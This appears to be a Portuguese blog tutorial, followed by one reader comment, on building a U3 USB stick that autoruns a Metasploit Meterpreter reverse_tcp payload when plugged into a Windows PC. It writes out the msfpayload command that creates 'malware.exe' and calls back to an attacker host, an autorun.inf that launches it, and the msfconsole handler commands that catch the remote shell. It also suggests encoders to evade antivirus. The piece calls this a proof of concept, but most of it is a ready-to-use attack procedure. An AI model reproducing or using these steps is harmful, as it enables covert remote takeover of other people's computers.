1 - O Ataque
Em 4 passos simples iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter.
A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer.
1. Gerar o payload com o Metasploit
Neste caso vamos criar um executável com uma conexão reversa do Meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe
Obviamente que podemos utilizar qualquer payload, como também utilizar encoders para tornar mais difícil sua detecção por antivírus.
2. Criar nossa ISO
Uma vez que tenhamos baixado e descompactado o Universal Customizer (http://www.hak5.org/packages/files/Universal_Customizer.zip), copiamos o arquivo malware.exe para o diretório "U3CUSTOM" e criamos o arquivo "autorun.inf" com o seguinte conteúdo:
[AutoRun]
open=malware.exe
Após isso, executamos o "ISOCreate.cmd" e dentro do diretório "BIN" será criada nossa ISO com o nome "U3CUSTOM.ISO". Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO "U3CUSTOM.ISO" que já vem dentro do pacote, com uma versão feita por Hacksaw.
3. Gravar a ISO
Iniciamos o Universal Customizer e vamos seguindo os passo:
Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.
4. Aguardando a conexão reversa
Para finalizar, devemos deixar o meterpreter "escutando" à espera da conexão reversa que será feita pelo payload gravado no pendrive:
./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false
exploit -j
Isso é tudo, que serve inclusive como uma prova de conceito para comprovar a segurança da máquina de um usuário.
LINKS RELACIONADOS:
http://www.infoseczen.com/?p=127
http://www.slideshare.net/seguinfo/sallis-usb-hacks
http://www.hak5.org/packages/files/Universal_Customizer.zip
Como fica este procedimento em um pendrive comum?
ResponderExcluir